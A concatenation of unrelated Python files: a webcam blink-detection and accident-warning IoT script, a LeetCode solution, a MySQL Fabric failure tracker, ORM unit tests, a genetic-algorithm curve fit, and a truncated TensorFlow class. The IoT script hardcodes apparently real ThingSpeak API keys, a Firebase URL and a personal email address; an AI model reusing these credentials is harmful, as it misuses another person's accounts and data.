msg.attach(MIMEText(message))\r\n\r\n print('sending mail to ' + recipient + ' on ' + subject)\r\n mailServer = smtplib.SMTP('smtp.gmail.com', 587)\r\n mailServer.ehlo()\r\n mailServer.starttls()\r\n mailServer.ehlo()\r\n mailServer.login(username, password)\r\n mailServer.sendmail(username, recipient, msg.as_string())\r\n mailServer.close()\r\n \r\ndef eye_aspect_ratio(eye):\r\n\tA = dist.euclidean(eye[1], eye[5])\r\n\tB = dist.euclidean(eye[2], eye[4])\r\n\tC = dist.euclidean(eye[0], eye[3])\r\n\tear = (A + B) / (2.0 * C)\r\n\treturn ear\r\ndef f1():\r\n wb=Workbook()\r\n s1 = wb.add_sheet('Sheet 1')\r\n global COUNTER,SND,SND1,TOTAL,TOTAL1,TOTAL2,SPEED,i,j,j1,x\r\n camera = cv2.VideoCapture(1)\r\n predictor_path = 'shape_predictor_68_face_landmarks.dat'\r\n EYE_AR_THRESH = 0.3\r\n EYE_AR_CONSEC_FRAMES = 3\r\n print(\"[INFO] loading facial landmark predictor...\")\r\n detector = dlib.get_frontal_face_detector()\r\n predictor = dlib.shape_predictor(predictor_path)\r\n (lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"left_eye\"]\r\n (rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"right_eye\"] \r\n while True:\r\n \t\r\n if(i%66==0):\r\n SND1=TOTAL-TOTAL2\r\n s1.write(j,0,SND1)\r\n TOTAL2=TOTAL\r\n j=j+1\r\n if(i%100==0):\r\n if j1>120:\r\n j1=0;\r\n SPEED=random.randint(j1,j1+20);\r\n j1=j1+20\r\n ret,frame = camera.read()\r\n frame = imutils.resize(frame, width=450)\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n rects = detector(gray, 0)\r\n for rect in rects:\r\n shape = predictor(gray,rect)\r\n shape = face_utils.shape_to_np(shape)\r\n leftEye = shape[lStart:lEnd]\r\n rightEye = shape[rStart:rEnd]\r\n leftEAR = eye_aspect_ratio(leftEye)\r\n rightEAR = eye_aspect_ratio(rightEye)\r\n ear = (leftEAR + rightEAR) / 2.0\r\n leftEyeHull = cv2.convexHull(leftEye)\r\n rightEyeHull = cv2.convexHull(rightEye)\r\n cv2.drawContours(frame, [leftEyeHull], -1, (0, 255, 0), 1)\r\n cv2.drawContours(frame, [rightEyeHull], -1, (0, 255, 0), 1)\r\n if ear < EYE_AR_THRESH:\r\n COUNTER += 1\r\n else:\r\n if COUNTER >= EYE_AR_CONSEC_FRAMES:\r\n TOTAL += 1\r\n COUNTER = 0\r\n cv2.putText(frame, \"Blinks: {}\".format(TOTAL), (10, 30),\r\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\r\n cv2.putText(frame, \"EAR: {:.2f}\".format(ear), (300, 30),\r\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\r\n \r\n cv2.imshow(\"Frame\", frame)\r\n key = cv2.waitKey(1) & 0xFF\r\n if key == ord(\"q\"):\r\n wb.save('exceln.xls')\r\n break\r\n i=i+1\r\n \r\n cv2.destroyAllWindows()\r\n camera.stop()\r\n \r\ndef f2():\r\n global TOTAL,TOTAL1,SPEED\r\n fr=firebase.FirebaseApplication('https://a124-270e9.firebaseio.com/')\r\n while True:\r\n time.sleep(25)\r\n #TS1 = urllib.request.urlopen(\"https://api.thingspeak.com/update?api_key=EGB3IM8MPQH4U8VK&field6=\"+str(SPEED)+\"&field3=\"+str(TOTAL-TOTAL1))\r\n TS1 = urllib.request.urlopen(\"https://api.thingspeak.com/update?api_key=JR3OADAOZLN12XA4&field6=\"+str(SPEED)+\"&field3=\"+str(TOTAL-TOTAL1))\r\n TS1.close()\r\n result1=fr.put('/','Blinkrate',str(TOTAL-TOTAL1))\r\n result2=fr.put('/','Speed',str(SPEED))\r\n TOTAL1=TOTAL\r\ndef f3():\r\n time.sleep(37)\r\n p=0#Temperature\r\n p1=0#Blink_Warning\r\n p2=0#Blink_Danger\r\n p3=0#Humidity\r\n p4=0#Flame\r\n p5=0#Vibration\r\n p6=0#Collision\r\n #READ_API_KEY_1='4W5UVHGWABFCNU0E'\r\n #CHANNEL_ID_1= '562330'\r\n READ_API_KEY_1='TIV70K9YECFW8T0C'\r\n CHANNEL_ID_1= '566179'\r\n speak = wincl.Dispatch(\"SAPI.SpVoice\")\r\n while True:\r\n h0=0\r\n h1=0\r\n h2=0\r\n ch = thingspeak.Channel(id=CHANNEL_ID_1,api_key=READ_API_KEY_1)\r\n x=ch.get_field_last(1)\r\n a1=convert(x)#Temperature\r\n x=ch.get_field_last(3)\r\n a3=convert(x)#Blink rate\r\n x=ch.get_field_last(6)\r\n a6=convert(x)#Speed\r\n x=ch.get_field_last(2)\r\n a2=convert(x)#Humidity\r\n x=ch.get_field_last(7)\r\n a7=convert(x)#Flame\r\n x=ch.get_field_last(5)\r\n a5=convert(x)#Vibration\r\n #x=ch.get_field_last(4)\r\n #a4=convert(x)#Collision\r\n a4=0\r\n if(a1>29 and p==0):\r\n send_mail('yesh385@gmail.com','Warning!','Temperature of package compromised')\r\n speak.Speak(\"Temperature Compromised\")\r\n p=1\r\n if(a2>60 and p3==0):\r\n send_mail('yesh385@gmail.com','Warning!','Humidity of package compromised')\r\n speak.Speak(\"Humidity Compromised\")\r\n p3=1\r\n if(a7==1 and p4==0):\r\n send_mail('yesh385@gmail.com','Warning!','Flame Alert')\r\n speak.Speak(\"Flame Alert\")\r\n p4=1\r\n if(a5>18000 and p5==0):\r\n send_mail('yesh385@gmail.com','Warning!','Vibration Alert')\r\n speak.Speak(\"Vibration Alert\")\r\n p5=1\r\n Reaction_dist=a4*0.3\r\n Braking_dist=((a4/10)**2)*0.4\r\n dist=Reaction_dist+Braking_dist+100\r\n if(dist>=a4 and p6==0):\r\n send_mail('yesh385@gmail.com','Warning!','Slow Down')\r\n speak.Speak(\"Slow Down\")\r\n p6=1\r\n if(clf.predict([[a6,a3]])==2):\r\n h2=h2+1\r\n elif(clf.predict([[a6,a3]])==1):\r\n h1=h1+1\r\n elif(clf.predict([[a6,a3]])==0):\r\n h0=h0+1\r\n if(clf1.predict([[a6,a3]])==2):\r\n h2=h2+1\r\n elif(clf1.predict([[a6,a3]])==1):\r\n h1=h1+1\r\n elif(clf1.predict([[a6,a3]])==0):\r\n h0=h0+1\r\n if(clf2.predict([[a6,a3]])==2):\r\n h2=h2+1\r\n elif(clf2.predict([[a6,a3]])==1):\r\n h1=h1+1\r\n elif(clf2.predict([[a6,a3]])==0):\r\n h0=h0+1\r\n if(clf3.predict([[a6,a3]])==2):\r\n h2=h2+1\r\n elif(clf3.predict([[a6,a3]])==1):\r\n h1=h1+1\r\n elif(clf3.predict([[a6,a3]])==0):\r\n h0=h0+1\r\n if(clf4.predict([[a6,a3]])==2):\r\n h2=h2+1\r\n elif(clf4.predict([[a6,a3]])==1):\r\n h1=h1+1\r\n elif(clf4.predict([[a6,a3]])==0):\r\n h0=h0+1\r\n if(max(h0,h1,h2)==h1 and p1==0):\r\n send_mail('yesh385@gmail.com','Warning!\\n','Accident Warning')\r\n p1=1\r\n for e in range(5):\r\n speak.Speak(\"Accident Warning\")\r\n elif(max(h0,h1,h2)==h2 and p2==0):\r\n send_mail('yesh385@gmail.com','Warning!\\n','Accident Danger')\r\n p2=1\r\n for e in range(5):\r\n speak.Speak(\"Accident Danger\")\r\n \r\n \r\nif __name__ == '__main__':\r\n Thread(target = f1).start()\r\n Thread(target = f2).start()\r\n Thread(target = f3).start()","sub_path":"logiX.py","file_name":"logiX.py","file_ext":"py","file_size_in_byte":9269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"9876079","text":"\"\"\"\n763. Partition Labels (Medium)\n\nA string S of lowercase letters is given. We want to partition this string into as many parts as possible so that each letter appears in at most one part, and return a list of integers representing the size of these parts.\n\nExample 1:\nInput: S = \"ababcbacadefegdehijhklij\"\nOutput: [9,7,8]\nExplanation:\nThe partition is \"ababcbaca\", \"defegde\", \"hijhklij\".\nThis is a partition so that each letter appears in at most one part.\nA partition like \"ababcbacadefegde\", \"hijhklij\" is incorrect, because it splits S into less parts.\nNote:\n\nS will have length in range [1, 500].\nS will consist of lowercase letters ('a' to 'z') only.\n\"\"\"\n\n\nclass Solution(object):\n def partitionLabels(self, S):\n \"\"\"\n :type S: str\n :rtype: List[int]\n \"\"\"\n memo = [-1] * 26\n for i, c in enumerate(S):\n idx = ord(c) - ord(\"a\")\n memo[idx] = i\n st = 0\n n = len(S)\n result = [0]\n while st < n:\n c = S[st]\n end = memo[ord(c) - ord(\"a\")]\n end_max = end\n while True:\n for i in range(st + 1, end + 1):\n c2 = S[i]\n end2 = memo[ord(c2) - ord(\"a\")]\n end_max = max(end_max, end2)\n if end_max == end:\n result.append(end - sum(result) + 1)\n break\n st, end = end, end_max\n st = end + 1\n return result[1:]\n\n def solve2(self, S):\n \"\"\"\n :type S: str\n :rtype: List[int]\n \"\"\"\n memo = [-1] * 26\n for i, c in enumerate(S):\n idx = ord(c) - ord(\"a\")\n memo[idx] = i\n end = memo[ord(S[0]) - ord(\"a\")]\n n = len(S)\n result = [-1]\n # while st < n:\n for i in range(n):\n # case 1: < end\n c = S[i]\n end = max(end, memo[ord(c) - ord(\"a\")])\n if end == i:\n result.append(end)\n result = [result[i + 1] - result[i] for i in range(len(result) - 1)]\n return result\n\n\nif __name__ == \"__main__\":\n a = Solution()\n # print(a.partitionLabels(\"ababc\"))\n # print(a.partitionLabels(\"ababcbacadefegdehijhklij\"))\n print(a.solve2(\"ababcbacadefegdehijhklij\"))\n","sub_path":"python/leetcode/string/763_partition_labels.py","file_name":"763_partition_labels.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"593983635","text":"#\n# Copyright (c) 2013,2014, Oracle and/or its affiliates. All rights reserved.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; version 2 of the License.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n#\n\"\"\"This module provides the necessary interfaces for reporting errors and\nfailures.\n\"\"\"\nimport logging\nimport uuid as _uuid\n\nfrom mysql.fabric.utils import (\n get_time,\n get_time_delta,\n)\n\nfrom mysql.fabric import (\n events as _events,\n server as _server,\n errors as _errors,\n error_log as _error_log,\n config as _config,\n)\n\nfrom mysql.fabric.command import (\n ProcedureGroup,\n)\n\nfrom mysql.fabric.services.server import (\n _retrieve_server\n)\n\n_LOGGER = logging.getLogger(__name__)\n\nREPORT_ERROR = _events.Event(\"REPORT_ERROR\")\nclass ReportError(ProcedureGroup):\n \"\"\"Report a server error.\n\n If there are many issues reported by different servers within a period of\n time, the server is marked as faulty. Should the server be a primary, the\n failover mechanism is triggered. Users who only want to set the server's\n status to faulty after getting enough notifications from different clients\n must set the update_only parameter to true. By default its value is false.\n \"\"\"\n group_name = \"threat\"\n command_name = \"report_error\"\n\n _MIN_NOTIFICATIONS = 1\n _NOTIFICATIONS = _DEFAULT_NOTIFICATIONS = 300\n\n _MIN_NOTIFICATION_CLIENTS = 1\n _NOTIFICATION_CLIENTS = _DEFAULT_NOTIFICATION_CLIENTS = 50\n\n _MIN_NOTIFICATION_INTERVAL = 1\n _MAX_NOTIFICATION_INTERVAL = 3600\n _NOTIFICATION_INTERVAL = _DEFAULT_NOTIFICATION_INTERVAL = 60\n\n def execute(self, server_id, reporter=\"unknown\", error=\"unknown\",\n update_only=False, synchronous=True):\n \"\"\"Report a server issue.\n\n :param server_id: Servers's UUID or HOST:PORT.\n :param reporter: Who has reported the issue, usually an IP address or a\n host name.\n :param error: Error that has been reported.\n :param update_only: Only update the state store and skip provisioning.\n \"\"\"\n procedures = _events.trigger(\n REPORT_ERROR, self.get_lockable_objects(), server_id, reporter,\n error, update_only\n )\n return self.wait_for_procedures(procedures, synchronous)\n\nREPORT_FAILURE = _events.Event(\"REPORT_FAILURE\")\nclass ReportFailure(ProcedureGroup):\n \"\"\"Report with certantity that a server has failed or is unreachable.\n\n Should the server be a primary, the failover mechanism is triggered.\n Users who only want to set the server's status to faulty must set the\n update_only parameter to True. By default its value is false.\n \"\"\"\n group_name = \"threat\"\n command_name = \"report_failure\"\n\n def execute(self, server_id, reporter=\"unknown\", error=\"unknown\",\n update_only=False, synchronous=True):\n \"\"\"Report a server issue.\n\n :param server_id: Servers's UUID or HOST:PORT.\n :param reporter: Who has reported the issue, usually an IP address or a\n host name.\n :param error: Error that has been reported.\n :param update_only: Only update the state store and skip provisioning.\n \"\"\"\n procedures = _events.trigger(\n REPORT_FAILURE, self.get_lockable_objects(), server_id, reporter,\n error, update_only\n )\n return self.wait_for_procedures(procedures, synchronous)\n\n@_events.on_event(REPORT_ERROR)\ndef _report_error(server_id, reporter, error, update_only):\n \"\"\"Report a server error.\n \"\"\"\n (now, server) = _append_error_log(server_id, reporter, error)\n\n interval = get_time_delta(ReportError._NOTIFICATION_INTERVAL)\n st = _error_log.ErrorLog.fetch(server, interval, now)\n\n if st.is_unstable(ReportError._NOTIFICATIONS,\n ReportError._NOTIFICATION_CLIENTS):\n group = _server.Group.fetch(server.group_id)\n if group.can_set_server_faulty(server, now):\n _set_status_faulty(server, update_only)\n\n@_events.on_event(REPORT_FAILURE)\ndef _report_failure(server_id, reporter, error, update_only):\n \"\"\"Report a server failure.\n \"\"\"\n (_, server) = _append_error_log(server_id, reporter, error)\n _set_status_faulty(server, update_only)\n\ndef _set_status_faulty(server, update_only):\n \"\"\"Set server's status to fauly and trigger a failover if the server\n is a master.\n\n This function assumes that the SERVER_LOST event is executed before\n the FAIL_OVER event.\n \"\"\"\n server.status = _server.MySQLServer.FAULTY\n\n _events.trigger_within_procedure(\n \"SERVER_LOST\", server.group_id, str(server.uuid)\n )\n\n if not update_only:\n _server.ConnectionPool().purge_connections(server.uuid)\n group = _server.Group.fetch(server.group_id)\n if group.master == server.uuid:\n _LOGGER.info(\"Master (%s) in group (%s) has \"\n \"been lost.\", server.uuid, group.group_id)\n _events.trigger_within_procedure(\"FAIL_OVER\", group.group_id)\n\ndef _append_error_log(server_id, reporter, error):\n \"\"\"Check whether the server exist and is not faulty and register\n error log.\n \"\"\"\n server = _retrieve_server(server_id)\n if server.status == _server.MySQLServer.FAULTY:\n raise _errors.ServerError(\n \"Server (%s) is already marked as faulty.\" % (server.uuid, )\n )\n\n _LOGGER.warning(\"Reported issue (%s) for server (%s).\", error, server.uuid)\n\n now = get_time()\n _error_log.ErrorLog.add(server, now, reporter, error)\n\n return (now, server)\n\ndef configure(config):\n \"\"\"Set configuration values.\n \"\"\"\n try:\n notifications = int(config.get(\"failure_tracking\", \"notifications\"))\n if notifications < ReportError._MIN_NOTIFICATIONS:\n _LOGGER.warning(\n \"Notifications cannot be lower than %s.\",\n ReportError._MIN_NOTIFICATIONS\n )\n notifications = ReportError._MIN_NOTIFICATIONS\n ReportError._NOTIFICATIONS = int(notifications)\n except (_config.NoOptionError, _config.NoSectionError, ValueError):\n pass\n\n try:\n notification_clients = \\\n int(config.get(\"failure_tracking\", \"notification_clients\"))\n if notification_clients < ReportError._MIN_NOTIFICATION_CLIENTS:\n _LOGGER.warning(\n \"Notification_clients cannot be lower than %s.\",\n ReportError._MIN_NOTIFICATION_CLIENTS\n )\n notification_clients = ReportError._MIN_NOTIFICATION_CLIENTS\n ReportError._NOTIFICATION_CLIENTS = int(notification_clients)\n except (_config.NoOptionError, _config.NoSectionError, ValueError):\n pass\n\n try:\n notification_interval = \\\n int(config.get(\"failure_tracking\", \"notification_interval\"))\n if notification_interval > _error_log.ErrorLog._PRUNE_TIME:\n _LOGGER.warning(\n \"Notification interval cannot be greater than prune \"\n \"interval %s\", _error_log.ErrorLog._PRUNE_TIME\n )\n notification_interval = _error_log.ErrorLog._PRUNE_TIME\n if notification_interval > ReportError._MAX_NOTIFICATION_INTERVAL:\n _LOGGER.warning(\n \"Notification interval cannot be greater than %s.\",\n ReportError._MAX_NOTIFICATION_INTERVAL\n )\n notification_interval = ReportError._MAX_NOTIFICATION_INTERVAL\n if notification_interval < ReportError._MIN_NOTIFICATION_INTERVAL:\n _LOGGER.warning(\n \"Notification interval cannot be lower than %s.\",\n ReportError._MIN_NOTIFICATION_INTERVAL\n )\n notification_interval = ReportError._MIN_NOTIFICATION_INTERVAL\n ReportError._NOTIFICATION_INTERVAL = int(notification_interval)\n except (_config.NoOptionError, _config.NoSectionError, ValueError):\n pass\n","sub_path":"mysql-utilities-1.6.0/mysql/fabric/services/failure_tracker.py","file_name":"failure_tracker.py","file_ext":"py","file_size_in_byte":8466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"305219903","text":"import unittest\nfrom pollen.pyport import error, session\nimport model\n\ncreate_stmts = [\n '''create sequence department_id_seq''',\n '''create table department (id integer not null, name varchar(200))''',\n '''create sequence employee_id_seq''',\n '''create table employee (id integer not null, first_name varchar(200),\n last_name varchar(200), department_id integer)''',\n '''create sequence pet_id_seq''',\n '''create table pet (id integer not null, name varchar(200), employee_id integer not null)''',\n ]\n\ndestroy_stmts = [\n '''drop table pet''',\n '''drop sequence pet_id_seq''',\n '''drop table employee''',\n '''drop sequence employee_id_seq''',\n '''drop table department''',\n '''drop sequence department_id_seq''',\n ]\n\ndef make_connection():\n from pyPgSQL import PgSQL\n connect_params = {}\n return PgSQL.connect(**connect_params)\n\nclass TestsBase(unittest.TestCase):\n\n def buildDatabase(self):\n curs = self.conn.cursor()\n for stmt in create_stmts:\n curs.execute(stmt)\n self.conn.commit()\n\n def destroyDatabase(self):\n curs = self.conn.cursor()\n for stmt in destroy_stmts:\n curs.execute(stmt)\n self.conn.commit()\n\n def setUp(self):\n self.conn = make_connection()\n self.buildDatabase()\n self.sess = session.Session(self.conn)\n\n def tearDown(self):\n self.sess.close()\n del self.sess\n self.conn.rollback()\n self.destroyDatabase()\n self.conn.close()\n\nclass BasicTests(TestsBase):\n\n def test_00_save(self):\n p = model.Employee(first_name='John', last_name='Smith')\n self.sess.save(p)\n self.sess.flush()\n\n def test_01_load(self):\n p = model.Employee(first_name='John', last_name='Smith')\n self.sess.save(p)\n self.sess.flush()\n p = self.sess.load(model.Employee, (p.id,))\n\n def test_02_update(self):\n p = model.Employee(first_name='John', last_name='Smith')\n self.sess.save(p)\n self.sess.flush()\n p = self.sess.load(model.Employee, (p.id,))\n p.first_name = 'Tim'\n p.last_name = 'Parkin'\n self.failIf(len(self.sess.updates) != 1)\n self.sess.flush()\n self.sess.flush()\n\n def test_03_delete(self):\n p = model.Employee(first_name='John', last_name='Smith')\n self.sess.save(p)\n self.sess.flush()\n p = self.sess.load(model.Employee, (p.id,))\n self.sess.remove(p)\n self.sess.flush()\n self.sess.flush()\n\nclass SessionJoinTests(TestsBase):\n\n def test_01_join(self):\n p = model.Employee(first_name='John', last_name='Smith')\n self.sess.save(p)\n self.sess.flush()\n p = self.sess.load(model.Employee, (p.id,))\n self.sess.close()\n del self.sess\n p.first_name = 'Tim'\n p.last_name = 'Parkin'\n self.sess = session.Session(self.conn)\n self.sess.join(p)\n self.sess.flush()\n\n def test_02_join_new(self):\n '''Test that joining a new object fails'''\n p = model.Employee(first_name='John', last_name='Smith')\n try:\n self.sess.join(p)\n self.fail('join with new object should fail')\n except error.Error:\n pass\n \nclass FindTests(TestsBase):\n\n def test_01_find(self):\n p = model.Employee(first_name='John', last_name='Smith')\n self.sess.save(p)\n self.sess.flush()\n ps = self.sess.find('from model.Employee')\n self.failIf(len(list(ps)) != 1)\n self.sess.save(model.Employee(first_name='Bill', last_name='Smith'))\n self.sess.flush()\n ps = self.sess.find('from model.Employee')\n self.failIf(len(list(ps)) != 2)\n ps = self.sess.find(\"from model.Employee as person where person.first_name='John'\")\n self.failIf(len(list(ps)) != 1)\n ps = self.sess.find(\"from model.Employee as person where person.last_name='Smith'\")\n self.failIf(len(list(ps)) != 2)\n ps = self.sess.find(\"from model.Employee as person where person.first_name='Wibble'\")\n self.failIf(len(list(ps)) != 0)\n\n def test_02(self):\n '''Test find using separate params'''\n self.sess.save(model.Employee(first_name='John', last_name='Smith'))\n self.sess.flush()\n l = list(self.sess.find(\"from model.Employee as e where e.first_name=%s\", 'John'))\n self.failIf(len(l) != 1)\n\nclass RelationTests(TestsBase):\n \n def setUp(self):\n TestsBase.setUp(self)\n d = model.Department(name='Engineering')\n d.employees.append(\n model.Employee(first_name='John', last_name='Smith'))\n d.employees.append(\n model.Employee(first_name='Bill', last_name='Smith'))\n self.sess.save(d)\n self.sess.flush()\n\n def test_01(self):\n '''Just to test that the overridden setUp is adding data correctly'''\n self.failIf(len(list(self.sess.find('from model.Department'))) != 1)\n self.failIf(len(list(self.sess.find('from model.Employee'))) != 2)\n\n def test_02(self):\n '''Test lazy fetching of relations'''\n d = self.sess.load(model.Department, (1))\n self.failIf(len(d.employees) != 2)\n \n def test_03(self):\n '''Test deletion of a collection item'''\n d = self.sess.load(model.Department, (1))\n del d.employees[0]\n self.sess.flush()\n d = self.sess.load(model.Department, (1))\n self.failIf(len(d.employees) != 1)\n \n def test_04(self):\n '''Test deletion of a collection item'''\n d = self.sess.load(model.Department, (1))\n del d.employees[:]\n self.sess.flush()\n d = self.sess.load(model.Department, (1))\n self.failIf(len(d.employees) != 0)\n\n def test_05(self):\n '''Test saving collections 2 deep'''\n d = model.Department(name='Marketing')\n d.employees.append(model.Employee(first_name='Kate', last_name='Watkins'))\n d.employees.append(model.Employee(first_name='Sam', last_name='Reece'))\n d.employees[0].pets.append(model.Pet(name='Fluffy'))\n d.employees[0].pets.append(model.Pet(name='Flipper'))\n self.sess.save(d)\n self.sess.flush()\n d = self.sess.load(model.Department, d.id)\n self.failIf(len(d.employees[0].pets) != 2)\n for employee in d.employees:\n if employee.first_name == 'Kate':\n self.failIf(len(employee.pets) != 2)\n if employee.first_name == 'Sam':\n self.failIf(len(employee.pets) != 0)\n\n def test_06(self):\n '''Test changes to nested collection'''\n d = model.Department(name='Marketing')\n d.employees.append(model.Employee(first_name='Kate', last_name='Watkins'))\n d.employees[0].pets.append(model.Pet(name='Fluffy'))\n self.sess.save(d)\n self.sess.flush()\n d = self.sess.load(model.Department, d.id)\n d.employees[0].pets.append(model.Pet(name='Flipper'))\n self.sess.flush()\n d = self.sess.load(model.Department, d.id)\n self.failIf(len(d.employees[0].pets) != 2)\n d = self.sess.load(model.Department, d.id)\n del d.employees[0].pets[0]\n self.sess.flush()\n d = self.sess.load(model.Department, d.id)\n self.failIf(len(d.employees[0].pets) != 1)\n \n def test_07_assign_self(self):\n \"\"\"Test that assigning itself doesn't change anything\"\"\"\n d = self.sess.load(model.Department, 1)\n d.employees = d.employees\n self.sess.flush()\n d2 = self.sess.load(model.Department, 1)\n self.failIf([e.id for e in d.employees] != [e.id for e in d2.employees])\n \n def test_08_assign_none(self):\n self.fail('Not implemented')\n\n\nclass CacheTests(TestsBase):\n\n def test_01_save_and_load(self):\n p = model.Employee(first_name='John', last_name='Smith')\n self.sess.save(p)\n self.sess.flush()\n identity = (p.id,)\n p1 = self.sess.load(model.Employee, identity)\n self.assertEquals(id(p ), id(p1))\n \n def test_01_load_multiple(self):\n p = model.Employee(first_name='John', last_name='Smith')\n self.sess.save(p)\n self.sess.flush()\n identity = (p.id,)\n p1 = self.sess.load(model.Employee, identity)\n p2 = self.sess.load(model.Employee, identity)\n self.assertEquals(id(p1), id(p2))\n \n def test_01_find(self):\n p = model.Employee(first_name='John', last_name='Smith')\n self.sess.save(p)\n self.sess.flush()\n p1 = list(self.sess.find('from model.Employee'))[0]\n p2 = list(self.sess.find('from model.Employee'))[0]\n self.assertEquals(id(p1), id(p2))\n \n\nunittest.main()\n","sub_path":"share/pollen/pyport/tests/test_session.py","file_name":"test_session.py","file_ext":"py","file_size_in_byte":8787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"58536115","text":"__author__ = 'msbcg452'\n\nimport numpy as np\nfrom scipy.integrate import ode\nfrom matplotlib import pyplot as plt\nfrom deap import base\nfrom deap import creator\nfrom deap import tools\nimport random\n\n\ndef evalOneMax(individual):\n a,b,c,d = individual\n if b<0:\n b=0.001\n individual[1]=0.001\n\n if c<0:\n c = 0\n individual[2]=0\n\n # print(b*t)\n # input()\n\n # vals = a * (tt + d) * np.log(b*(tt+d))+c*(tt+d)+e\n\n vals = a*np.log(b*dtt + c) + d\n return -sum((vals-dyy)**2),\n\n\ndef main():\n # random.seed(64)\n\n pop = toolbox.population(n=4000)\n CXPB, MUTPB, NGEN = 0.5, 0.2, 200\n\n print(\"Start of evolution\")\n\n # Evaluate the entire population\n fitnesses = list(map(toolbox.evaluate, pop))\n\n for ind, fit in zip(pop, fitnesses):\n\n ind.fitness.values = fit\n\n print(\" Evaluated %i individuals\" % len(pop))\n\n # Begin the evolution\n for g in range(NGEN):\n print(\"-- Generation %i --\" % g)\n\n # Select the next generation individuals\n offspring = toolbox.select(pop, len(pop))\n # Clone the selected individuals\n offspring = list(map(toolbox.clone, offspring))\n\n # Apply crossover and mutation on the offspring\n for child1, child2 in zip(offspring[::2], offspring[1::2]):\n if random.random() < CXPB:\n toolbox.mate(child1, child2)\n del child1.fitness.values\n del child2.fitness.values\n\n for mutant in offspring:\n if random.random() < MUTPB:\n toolbox.mutate(mutant)\n del mutant.fitness.values\n\n # Evaluate the individuals with an invalid fitness\n invalid_ind = [ind for ind in offspring if not ind.fitness.valid]\n fitnesses = map(toolbox.evaluate, invalid_ind)\n for ind, fit in zip(invalid_ind, fitnesses):\n ind.fitness.values = fit\n\n print(\" Evaluated %i individuals\" % len(invalid_ind))\n\n # The population is entirely replaced by the offspring\n pop[:] = offspring\n\n # Gather all the fitnesses in one list and print the stats\n fits = [ind.fitness.values[0] for ind in pop]\n\n length = len(pop)\n mean = sum(fits) / length\n sum2 = sum(x*x for x in fits)\n std = abs(sum2 / length - mean**2)**0.5\n\n print(\" Min %s\" % min(fits))\n print(\" Max %s\" % max(fits))\n print(\" Avg %s\" % mean)\n print(\" Std %s\" % std)\n\n print(\"-- End of (successful) evolution --\")\n\n best_ind = tools.selBest(pop, 1)[0]\n print(\"Best individual is %s, %s\" % (best_ind, best_ind.fitness.values))\n z = np.linspace(0.001, 1)\n\n # vz = best_ind[0] * (z + best_ind[3]) * np.log(best_ind[1]*(z + best_ind[3]))+best_ind[2]*(z + best_ind[3])+best_ind[4]\n a,b,c,d = best_ind\n vz = a*np.log(b*z + c) + d\n plt.plot(z,vz)\n\n plt.plot(dtt, dyy)\n plt.show()\n\n\ndef f(c, y):\n w = y[0]\n\n f2 = (2*c* (1 - 2 * c + w) * (-1 + w)) / (2*(c**2 -1) *(c - w))\n f5 = 5*c**4 * (1-2*c+w) * (-1+w)/ (2*(c**5-1)*(c-w))\n f1 = (1-2*c+w) * (-1+w)/ (2*(c-1)*(c-w))\n f3 = (3*c**2 * (1 - 2 * c + w) * (-1 + w)) / (2*(c**3 -1) *(c - w))\n # f0 = (w-2*c+1)*(w-1) /( (c-1)*(c-w))\n return f2\nt = np.zeros((1000))\ny = np.zeros((1000))\nw0 = .998\ny0 = [w0]\nt0 = .999\nt1 = .001\ndt = -0.001\nr = ode(f)\nr.set_initial_value(y0,t0)\nr.set_integrator(\"dop853\",nsteps=1000)\ni = 0\nwhile r.successful() and r.t > t1:\n r.integrate(r.t+dt)\n # print(\"%g %g\" % (r.t, r.y))\n t[i] = r.t\n y[i] = r.y\n i+=1\nw = np.where(y<0,0,y)\nplt.plot(t,w)\n\nplt.show()\n\nprint(y[::-1])\n\n\n\n","sub_path":"odepde.py","file_name":"odepde.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"559577136","text":"import tensorflow as tf\nimport matplotlib.pyplot as plt\n\nclass SimpleNeuralNetwork:\n\n\tdef __init__(self,input_dimensions, output_dimensions, no_hiddenLayers, neurons_hidden_layers_list):\n\t\tself.X = tf.placeholder(\"float\", [None,input_dimensions])\n\t\tself.Y = tf.placeholder(\"float\", [None,output_dimensions])\n\t\tself.dropout_placeholder = tf.placeholder(tf.float32)\n\t\tself.number_of_hidden_layers = no_hiddenLayers\n\t\tself.NumberOfNeurons_EachLayer = neurons_hidden_layers_list\n\t\tself.NumberOfNeurons_EachLayer.insert(0,input_dimensions)\n\t\tself.NumberOfNeurons_EachLayer.append(output_dimensions)\n\n\tdef inputPlaceholder(self):\n\t\treturn self.X\n\n\tdef outputPlaceholder(self):\n\t\treturn self.Y\n\n\tdef dropoutPlaceholder(self):\n\t\treturn self.dropout_placeholder\n\n\tdef createWeightsVector(self):\n\t\tself.WeightsKeys = [('w_'+str(i)) for i in range(self.number_of_hidden_layers+1)]\n\t\tself.WeightsKeys[-1] = 'w_out'\n\t\tself.weights = dict.fromkeys(self.WeightsKeys,)\n\t\tfor i in range(len(self.WeightsKeys)):\n\t\t\tself.weights[self.WeightsKeys[i]] = tf.Variable(tf.truncated_normal([self.NumberOfNeurons_EachLayer[i],self.NumberOfNeurons_EachLayer[i+1]], stddev = 0.1))\n\t\treturn self.weights\n\n\tdef createBiasVector(self):\n\t\tself.BiasKeys = [('b_'+str(i)) for i in 